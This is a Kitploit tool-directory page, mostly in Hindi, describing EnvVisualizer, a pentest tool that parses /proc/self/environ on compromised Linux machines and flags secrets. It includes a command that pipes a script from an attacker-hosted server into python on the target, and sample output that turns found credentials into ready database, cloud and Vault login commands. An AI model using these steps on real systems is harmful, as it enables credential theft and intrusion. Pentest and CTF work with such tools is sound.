Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
EnvVisualizer — समझौता किए गए Linux बॉक्स पर /proc/self/environ को पार्स और विज़ुअलाइज़ करें — env वेरिएबल्स को टेक स्टैक (AWS, Django, Rails, NodeJS, MySQL, K8s, Docker, आदि…) के अनुसार वर्गीकृत करता है और तैयार-से-चलाने योग्य कमांड्स के साथ गंभीरता-रेटेड इनसाइट्स उत्पन्न करता है | Kitploit
उपकरण/GitHubGitHub/w4r10ck423/envvisualizer
रक्षात्मक उपकरणभेद्यता विश्लेषणकॉन्फ़िगरेशन ऑडिटिंगजानकारी एकत्र करनापोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षासीक्रेट डिटेक्शनरेड टीमिंग
GitHubw4r10ck423/envvisualizer
444 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

EnvVisualizer

समझौता किए गए Linux बॉक्स पर /proc/self/environ को पार्स और विज़ुअलाइज़ करें — env वेरिएबल्स को टेक स्टैक (AWS, Django, Rails, NodeJS, MySQL, K8s, Docker, आदि…) के अनुसार वर्गीकृत करता है और तैयार-से-चलाने योग्य कमांड्स के साथ गंभीरता-रेटेड इनसाइट्स उत्पन्न करता है

रिपॉजिटरी देखें
साझा करें

EnvVisualizer

root@kitploit:~
___________           ____   ____.__                    .__  .__                     
\_   _____/ _______  _\   \ /   /|__| ________ _______  |  | |__|_______ ___________ 
 |    __)_ /    \  \/ /\   Y   / |  |/  ___/  |  \__  \ |  | |  \___   // __ \_  __ \
 |        \   |  \   /  \     /  |  |\___ \|  |  // __ \|  |_|  |/    /\  ___/|  | \/
/_______  /___|  /\_/    \___/   |__/____  >____/(____  /____/__/_____ \\___  >__|   
        \/     \/                        \/           \/              \/    \/       

समझौता किए गए Linux मशीनों पर /proc/self/environ को पार्स, वर्गीकृत और विज़ुअलाइज़ करें।
जुड़े हुए environment variable टेक्स्ट की दीवार को कुछ ही सेकंड में संरचित, रंग-कोडित intel में बदलें।


Python Platform License Context Author

लेखक: @W4r10ck423


समस्या

जब आप किसी बॉक्स पर पहुँचते हैं और /proc/self/environ पढ़ते हैं, तो आपको यह मिलता है:

root@kitploit:~
USER=devnpm_config_user_agent=npm/8.5.1 node/v12.22.9 linux x64 workspaces/falsenpm_node_execpath=/usr/bin/nodenpm_config_noproxy=HOME=/home/devnpm_package_json=/home/dev/projects/store1/package.jsonnpm_config_local_prefix=/home/dev/projects/store1SYSTEMD_EXEC_PID=881COLOR=0LOGNAME=devJOURNAL_STREAM=8:6005PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binNODE=/usr/bin/nodeLANG=C.UTF-8npm_lifecycle_script=nodemon --exec 'node --inspect=127.0.0.1:9229 /home/dev/projects/store1/start.js'SHELL=/bin/bashnpm_lifecycle_event=watchEDITOR=vi

EnvVisualizer इसे इसमें बदल देता है:

root@kitploit:~
============================================================================
  EnvVisualizer — /proc/self/environ  (32 variables)
============================================================================

── Identity  (4) ───────────────────────────────────────────────────────────
  HOME                                 /home/dev
  LOGNAME                              dev
  SHELL                                /bin/bash
  USER                                 dev

── Paths & Dirs  (10) ──────────────────────────────────────────────────────
  PATH
      • /home/dev/projects/store1/node_modules/.bin
      • /home/dev/projects/node_modules/.bin
      • /usr/local/sbin
      • /usr/local/bin
      • /usr/sbin
      • /usr/bin
      • /sbin
      • /bin
      • /snap/bin
  PWD                                  /home/dev/projects/store1
  npm_config_cache                     /home/dev/.npm
  npm_execpath                         /usr/share/nodejs/npm/bin/npm-cli.js

── NPM / Node  (12) ────────────────────────────────────────────────────────
  NODE                                 /usr/bin/node
  npm_command                          run-script
  npm_config_user_agent                npm/8.5.1 node/v12.22.9 linux x64 workspaces/false
  npm_lifecycle_script                 nodemon --exec 'node --inspect=127.0.0.1:9229 ...'
  npm_package_json                     /home/dev/projects/store1/package.json

── System  (6) ─────────────────────────────────────────────────────────────
  COLOR                                0
  EDITOR                               vi
  INVOCATION_ID                        abc0ab20c7dd498792d8be51c591071a
  JOURNAL_STREAM                       8:6005
  LANG                                 C.UTF-8
  SYSTEMD_EXEC_PID                     881

── Pentest Insights ────────────────────────────────────────────────────────
  ▶  Node.js debugger exposed → 127.0.0.1:9229  (try: node-inspector / chrome://inspect)
  ▶  Home dir: /home/dev
  ▶  Shell: /bin/bash
  ▶  npm_lifecycle_script = nodemon --exec 'node --inspect=127.0.0.1:9229 ...'
  ▶  npm_lifecycle_event = watch

rich इंस्टॉल होने पर, प्रत्येक श्रेणी को अपनी रंग-कोडित तालिका मिलती है।


विशेषताएँ

  • तीन इनपुट मोड — फ़ाइल को सीधे पढ़ें (पूर्ण सटीकता), stdin के माध्यम से पाइप करें, या एक कच्ची स्ट्रिंग पेस्ट करें
  • स्मार्ट दो-वर्ग पार्सर — कॉपी-पेस्ट द्वारा null bytes हटाए जाने पर जुड़ी हुई स्ट्रिंग्स को सही ढंग से संभालता है; uppercase POSIX vars और ज्ञात lowercase prefixed vars (npm_*, node_*, pip_*, आदि) का पता लगाता है
  • छह सिमेंटिक श्रेणियाँ — Security/Auth, Identity, Paths & Dirs, NPM/Node, Network/Proxy, System, और Other
  • PATH विस्तार — प्रत्येक निर्देशिका को colon-separated दीवार के बजाय बुलेट पॉइंट के रूप में सूचीबद्ध किया जाता है
  • Secret डिटेक्शन — उन वेरिएबल्स को चिह्नित करता है जिनके नाम या मान credential पैटर्न (TOKEN, KEY, SECRET, PASSWORD, आदि) से मेल खाते हैं, ⚠ चेतावनी के साथ
  • Pentest Insights पैनल — स्वचालित रूप से कार्रवाई योग्य निष्कर्ष सामने लाता है: root context, sudo escalation, उजागर Node.js debugger पोर्ट, सक्रिय lifecycle स्क्रिप्ट
  • Rich या plain — rich इंस्टॉल होने पर रंग-कोडित तालिकाएँ; fallback के रूप में साफ़ plain-text आउटपुट (शून्य निर्भरता आवश्यक)

इंस्टॉलेशन

विकल्प 1 — क्लोन करें और चलाएँ (pentest वातावरण के लिए अनुशंसित)

root@kitploit:~
git clone https://github.com/w4r10ck423/EnvVisualizer.git
cd EnvVisualizer
pip install rich          # optional but recommended
python3 envvisualizer.py --help

विकल्प 2 — सिस्टम कमांड के रूप में इंस्टॉल करें

root@kitploit:~
git clone https://github.com/w4r10ck423/EnvVisualizer.git
cd EnvVisualizer
pip install .
envvisualizer --help

विकल्प 3 — सिंगल-फ़ाइल ड्रॉप (git की आवश्यकता नहीं)

envvisualizer.py को लक्ष्य या हमलावर मशीन पर कॉपी करें। यह शून्य निर्भरता के साथ चलता है:

root@kitploit:~
# On the attacker machine — host it
python3 -m http.server 8080

# On the target machine — grab and run
curl http://<attacker-ip>:8080/envvisualizer.py | python3 - -f /proc/self/environ

आवश्यकताएँ

DependencyVersionRequired
Python≥ 3.8Yes
rich≥ 13.0No (plain-text fallback)

उपयोग

root@kitploit:~
usage: envvisualizer [-h] [-f PATH] [-r STRING] [--no-rich]

options:
  -h, --help            show this help message and exit
  -f PATH, --file PATH  Environ file path (null-byte delimited)
  -r STRING, --raw STRING
                        Raw concatenated environ string (copy-pasted, no null bytes)
  --no-rich             Force plain-text output

इनपुट मोड

सुझाव: जब भी आपके पास फ़ाइल एक्सेस हो, -f को प्राथमिकता दें।
वास्तविक फ़ाइल में null-byte delimiter सटीक है — किसी heuristic की आवश्यकता नहीं।


उदाहरण

proc से सीधे पढ़ें (सर्वोत्तम सटीकता)

root@kitploit:~
# Current process
python3 envvisualizer.py -f /proc/self/environ

# Another process by PID
python3 envvisualizer.py -f /proc/1337/environ

# Any process you can read
python3 envvisualizer.py -f /proc/$(pgrep node)/environ

stdin के माध्यम से पाइप करें

root@kitploit:~
cat /proc/self/environ | python3 envvisualizer.py

एक कच्ची स्ट्रिंग पेस्ट करें (web shell / RCE आउटपुट से कॉपी-पेस्ट किया गया)

root@kitploit:~
python3 envvisualizer.py -r 'USER=devnpm_config_user_agent=npm/8.5.1 node/v12.22.9 ...'

Plain-text आउटपुट (rich निर्भरता के बिना)

root@kitploit:~
python3 envvisualizer.py -f /proc/self/environ --no-rich

आउटपुट श्रेणियाँ

वेरिएबल्स को 12 श्रेणियों में समूहित किया जाता है, प्राथमिकता क्रम में मूल्यांकन किया जाता है (पहला मेल जीतता है)।


Pentest Insights

Pentest Insights पैनल चार severity स्तरों के साथ लक्षित, stack-aware डिटेक्शन फायर करता है।
तैयार-से-चलाने योग्य कमांड environment में पाए गए वास्तविक मानों से तुरंत उत्पन्न होते हैं।

टेक स्टैक के अनुसार डिटेक्शन

उदाहरण आउटपुट (मल्टी-स्टैक परिदृश्य)

root@kitploit:~
── Pentest Insights ─────────────────────────────────────────────────────────
  [!!!]  PostgreSQL password in env → psql postgresql://appuser:[email protected]:5432/production_db
  [!!!]  DATABASE_URL contains embedded credentials → postgresql://admin:[email protected]:5432/maindb
  [!!!]  MongoDB root credentials in env → mongosh -u admin -p 'mongoS3cret'
  [!!!]  AWS long-term credentials → KEY=AKIAIOSFODNN7EXAMPLE  (run: aws sts get-caller-identity)
  [!!!]  HashiCorp Vault token in env → vault token lookup  addr: http://vault.internal:8200
  [!!!]  Stripe LIVE secret key — production payment API access
  [!!!]  Rails master key in env — decrypts config/credentials.yml.enc
  [!! ]  Redis auth → redis-cli -h redis.internal -p 6379 -a 'r3disP@ss'
  [!! ]  Inside Kubernetes pod → service host: 10.96.0.1
  [!! ]  GitHub token in env → curl -H 'Authorization: token $GITHUB_TOKEN' ...
  [!! ]  Django DEBUG=True — full stack traces served to users
  [!! ]  JVM remote debugging enabled → -agentlib:jdwp=...  (try: jdb -attach <host>:<port>)
  [ * ]  Python venv active → /var/www/myapp/.venv

स्ट्रिंग पार्सर कैसे काम करता है

जब /proc/self/environ कॉपी-पेस्ट किया जाता है (जैसे, web shell या curl आउटपुट से), null bytes हटा दिए जाते हैं, जिससे आसन्न वेरिएबल्स जुड़ जाते हैं:

root@kitploit:~
USER=dev·npm_config_user_agent=npm/8.5.1...
     ↑──↑↑───────────────────↑
   value    next key starts here

एक naive WORD= split devnpm_config_user_agent को key के रूप में उत्पन्न करेगा।

EnvVisualizer एक दो-वर्ग सीमा डिटेक्टर का उपयोग करता है जो केवल इन पर विभाजित करता है:

  1. Uppercase-प्रमुख keys — USER, HOME, JOURNAL_STREAM, आदि
  2. ज्ञात lowercase prefixes — npm_*, node_*, pip_*, java_*, python_*, ruby_*, आदि

चूँकि regex जुड़े हुए टोकन के भीतर npm_config_user_agent पाता है, पिछला मान स्वचालित रूप से dev तक ट्रिम हो जाता है। कोई lookbehind नहीं, कोई word-boundary धारणा नहीं — बस key पैटर्न ही anchor के रूप में।


लाइसेंस

MIT — स्वतंत्र रूप से उपयोग करें, attribution की सराहना की जाती है।

टूल डाउनलोड करें
MethodCommandAccuracy
Direct file readpython3 envvisualizer.py -f /proc/self/environ✅ Perfect (null-byte split)
Stdin pipecat /proc/self/environ | python3 envvisualizer.py✅ Perfect (null-byte split)
Pasted stringpython3 envvisualizer.py -r 'USER=dev...'✅ Good (two-class heuristic)
No args (demo)python3 envvisualizer.py✅ Perfect (own process)
CategoryTypical Variables
🔐 Security / AuthSSH_*, SUDO_*, anything matching TOKEN, KEY, SECRET, PASSWORD, CREDENTIAL, CERT
👤 IdentityUSER, LOGNAME, HOME, SHELL, UID, GID
🗄 DatabasePG*, MYSQL_*, MONGO*, REDIS_*, DATABASE_URL, DB_*, ELASTIC*, CASSANDRA_*, SQLALCHEMY_*
☁ Cloud / InfrastructureAWS_*, GOOGLE_*, AZURE_*, ARM_*, DOCKER_*, KUBERNETES_*, VAULT_*, TF_*, CLOUDFLARE_*
🔄 CI/CD & VCSGITHUB_*, GITLAB_*, CI_*, TRAVIS_*, CIRCLE*, JENKINS_*, HEROKU_*, BUILD_*
🔌 Third-party APIsSTRIPE_*, TWILIO_*, SENDGRID_*, SENTRY_*, DD_*, SLACK_*, OPENAI_*, ALGOLIA_*, AUTH0_*
🕸 Web FrameworksDJANGO_*, FLASK_*, RAILS_*, SPRING_*, ASPNETCORE_*, APP_KEY/ENV/DEBUG, SECRET_KEY_BASE, MIX_ENV, NEXT_*, VITE_*, REACT_APP_*
🐍 App RuntimesPYTHON*, CONDA_*, VIRTUAL_ENV, GEM_*, BUNDLE_*, JAVA_*, JVM_*, MAVEN_*, CATALINA_*, GO*, RUST*, CARGO_*, PHP_*, DOTNET_*, PERL*, DENO_*
📦 NPM / Nodenpm_*, NODE, NODE_ENV, NODE_OPTIONS
📂 Paths & DirsPATH, PWD, *_DIR, *_PREFIX, *_HOME, *_CACHE, INIT_CWD
🌐 Network / Proxy*_PROXY, HOSTNAME, SSL_CERT_*, CURL_CA_BUNDLE, *_URL, *_ADDR
⚙ SystemLANG, TERM, EDITOR, INVOCATION_ID, JOURNAL_STREAM, XDG_*, LC_*
OtherEverything else, sorted alphabetically
SeverityPrefixMeaning
💀 CRITICAL[!!!]Live credential, secret key, or master key — immediate impact
⚠ HIGH[!! ]Token, debug mode, or exposed service — actionable attack path
→ MEDIUM[! ]Interesting info that may assist escalation
▶ INFO[ * ]General context about the process and environment
StackWhat's detected
PostgreSQLPGPASSWORD → auto-builds psql postgresql://user:pass@host/db
MySQL / MariaDBMYSQL_ROOT_PASSWORD / MYSQL_PASSWORD → auto-builds mysql command
MongoDBMONGO_INITDB_ROOT_* → auto-builds mongosh command
RedisREDIS_PASSWORD → auto-builds redis-cli -a command
DB URLsDATABASE_URL, MONGODB_URI, etc. → flags embedded credentials
AWSKey pair → flags as long-term or STS temporary, suggests aws sts get-caller-identity
GCPGOOGLE_APPLICATION_CREDENTIALS → suggests gcloud auth activate-service-account
AzureAZURE_CLIENT_SECRET → flags tenant ID + suggests az login --service-principal
HashiCorp VaultVAULT_TOKEN + VAULT_ADDR → suggests vault token lookup
KubernetesInjected KUBERNETES_SERVICE_HOST → flags pod context, suggests SA token read
DockerDOCKER_HOST set → flags daemon exposure
GitHub / GitLabTokens → suggests API validation curl commands
HerokuHEROKU_API_KEY → flags with app name
StripeLive sk_live_* → CRITICAL; test sk_test_* → MEDIUM
DatadogDD_API_KEY → flags metrics/logs/traces access
SlackSLACK_BOT_TOKEN / SLACK_APP_TOKEN → flags workspace access
OpenAIOPENAI_API_KEY → flags billing exposure
DjangoDJANGO_DEBUG=True → flags stack trace exposure
FlaskFLASK_DEBUG=1 → flags Werkzeug interactive debugger (PIN bypass / SSTI)
LaravelAPP_DEBUG=true + APP_KEY=base64:* → flags cookie forgery path
RailsRAILS_MASTER_KEY → CRITICAL (decrypts credentials.yml.enc); SECRET_KEY_BASE → session cookie forgery
JVMJAVA_TOOL_OPTIONS with jdwp → flags remote debug port, suggests jdb -attach
TomcatCATALINA_HOME → flags path to tomcat-users.xml
Node.js--inspect / --inspect-brk → flags debugger, suggests chrome://inspect
KerberosKRB5CCNAME → flags ticket cache, suggests klist / Impacket
SudoSUDO_USER → shows original UID/GID before escalation